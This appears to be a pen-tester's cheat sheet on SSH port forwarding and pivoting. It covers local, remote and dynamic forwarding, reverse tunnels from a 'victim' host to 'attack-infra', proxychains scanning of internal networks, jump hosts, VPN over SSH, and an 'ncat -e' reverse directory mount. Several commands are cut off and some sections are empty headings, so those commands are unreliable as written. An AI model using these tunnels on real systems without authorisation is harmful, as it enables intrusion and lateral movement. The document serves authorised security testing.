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local port forwarding

requires: 'AllowTcpForwarding yes' on SSHD

ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
(exposes remote service <remote host>:<remote port> to local port via ssh tunnel)
(connections made to <local port to listen> will be forwarded to <remote host>:<remote port>)

# use case #1: prepare tunnel for attacking your victim
pen-tester$ ssh user@attack-infra -L 1234:victim:80
pen-tester$ curl

# use case #2: attack victim's 445 port when access to it's sshd has been obtained
attack-infra$ ssh user@victim -L 1234:
pen-tester$ nbtscan attack-infra:1234

remote port forwarding

requires: 'AllowTcpForwarding yes' on SSHD

ssh <gateway> -R <remote port to bind>:<local host>:<local port>
(exposes local serivce <local host>:<local port> on the remote host via ssh tunnel)
(connections made to <remote port to bind> on remote host will be forwared to <local host>:<local port>)

# use case #1: expose internal RDP service to outside of the intranet
victim$ ssh user@attack-infra -p53 -R 1234:
pen-tester$ rdesktop attack-infra:1234 

# use case #2 (special case of #1): reverse SSH tunnel (from victim to attack-infra)
# NOTE: on attack-infra in /etc/ssh/sshd_config set 'GatewayPorts yes' to be able connect from pen-tester
victim$ ssh -f -N -p53 -R 2222: user@attack-infra
pen-tester$ ssh user@attack-infra -p2222

# use case #3 (the same as #2 but with additional IP access control) - didn't work for me
# NOTE: on attack-infra in /etc/ssh/sshd_config set 'GatewayPorts clientspecified' to be able connect from pen-tester
victim$ ssh -f -N -p53 -R <pen-tester-ip>:2222: user@attack-infra
pen-tester$ ssh user@attack-infra -p2222

dynamic port forwarding

Requires: AllowTcpForwarding yes on SSHD (default setting)

ssh -D <local proxy host:port> -p <remote port> <target>

# use case #1: create local socks4 proxy which will tunnel incoming traffic to victimDMZ
ssh -D1234 -p22 user@victim

# use case #2: reverse ssh from victim allows to scan whole internal network
victim$ ssh -f -N -R 2222: root@attack-infra
pen-tester$ ssh -f -N -D -p 2222 root@attack-infra
pen-tester$ (add 'socks4 8082' to /etc/proxychains.conf)
pen-tester$ proxychains nmap --top-ports=20 -sT -Pn <target> 

Wrapper to provide ssh -D functionality in cases when forwarding is disabled (AllowTcpForwarding No):

reverse SOCKS proxy

On Linux box (SSH’d to localhost with the -D option to get the SOCKS server running, then make a second connection to the Internet to port-forward access to the SOCKS service):

# (not verified solution yet):
ssh -D4321 user@
ssh -N -P443 -i key.pem -R 1234: user@external_attack_machine

# on 'external_attack_machine' use proxchains with following configuration:
socks5 1234

From Windows box (3rd party software needed to run SOCKS server):

Possible alternative (no SSH used) solutions:

SSH over SSL

ssh over socks proxy

$ ssh -i key.pem -o 'ProxyCommand=nc -X 5 -x proxy:1080 %h %p' user@host

connect to host via other SSH jump box

Basic scenario:

ssh -o ProxyCommand="ssh -W %h:%p -i proxykey.pem proxy_user@proxy_host" user@host
scp -r -o ProxyCommand="ssh -W %h:%p -i proxykey.pem proxy_user@proxy_host" user@host:dir ./

Multiple SSH hops:

ssh -i host-key.pem -J user1@hop1,user2@hop2 user@host
scp -i host-key.pem -r -o 'ProxyJump user1@hop1,user2@hop2' user@host:dir ./

Multiple SSH hops each requiring different identity key:

eval `ssh-agent -s`
ssh-add -D
ssh-add key1.pem 
ssh-add key2.pem
ssh -i host-key.pem -Juser1@hop1,user2@hop2 user@host

VPN over SSH

Requires modifications of sshd configuration, specifically:

PermitRootLogin yes
PermitTunnel yes # non-default setting


ssh username@server -w any:any

For detailed setup see:

custom VPN solution over SSH

Poor's man VPN solution over SSH tunnel (no server-side modifications are needed):

mounting directories over SSH

# reverse directory mount (
ncat -l -p 34567 -e "/usr/lib/ssh/sftp-server" & ssh -t -R 34568:localhost:34567 -i key.pem user@IP "sudo -E sshfs localhost: DIRNAME -o directport=34568; sudo -E bash"

Metasploit via jump host

Other interesting
# rescue when "ssh -D" is not supported by the sshd:
# blending your SSH traffic: